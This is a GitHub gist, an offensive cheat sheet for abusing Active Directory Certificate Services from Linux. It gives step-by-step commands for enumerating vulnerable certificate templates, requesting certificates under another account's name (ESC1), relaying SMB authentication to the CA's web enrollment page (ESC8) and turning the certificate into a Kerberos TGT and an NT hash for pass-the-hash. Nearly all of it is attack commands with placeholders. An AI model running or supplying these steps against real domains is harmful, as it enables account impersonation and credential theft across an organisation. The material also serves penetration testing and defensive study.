Skip to content

Instantly share code, notes, and snippets.

Last active August 26, 2023 13:22
  • Star 30 You must be signed in to star a gist
  • Fork 10 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
PKI Abuse CheatSheet

PKI Abuse

Some golden links when you are having issues:

Enumerating ADCS On Linux

Download and install Certi

git clone
cd certi
sudo python3 install

Certi only support kerberos auth, so to perform authenticated enumeration, you need to fetch a TGT for a valid user first. '<domain>/<username>:<password>' -dc-ip <dc-ip>

Set the env var to the output ccache

export KRB5CCNAME=<username>.ccache

Enumerate Certificate Authorities on the domain (CA's)

python3 list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class ca

Enumerate CA Services on the domain (Actual server names)

python3 list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class service

Enumerate vuln templates

python3 list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enable

Requesting certs from CA Linux

Requesting a cert with an alt subject name (ESC1)

python3 req '<domain>/<username>@<ca-server>' <ca-service-name> -k -n --dc-ip <dc-ip> --template <vuln-template> --alt-name <target-domain-account>

Requesting cert by SMB relaying On Linux (ESC8)

Relaying incoming SMB connection to ADCS to generate a certificate on

Fetch and install a custom fork of impacket

git clone
cd impacket
git checkout ntlmrelayx-adcs-attack

Create a virtual python env to contain this version of impacket (Avoid breaking the release you already have installed)

apt install python3-venv
python3 -m venv adcs-impacket

Move "into" this virutal env

source adcs-impacket/bin/activate

Still inside the impacket folder

pip3 install .

You can now setup ntlmrelay for realying

python3 examples/ -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>

Authentication using certificate on Linux

Request an TGT on behalf of the account

python3 <domain>/<username> -pfx-base64 $(cat <base64-cert.file>) -dc-ip <dc-ip> out_tgt.ccache

Set the env var to the output TGT ccache

export KRB5CCNAME=out_tgt.ccache

Get an NTHash for Pass-The-Hash from TGT, AS-REP-KEY-ENC is from the output of the command above.

python3 -key <AS-REP-ENC-KEY> -dc-ip <dc-ip> <domain>/<username>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment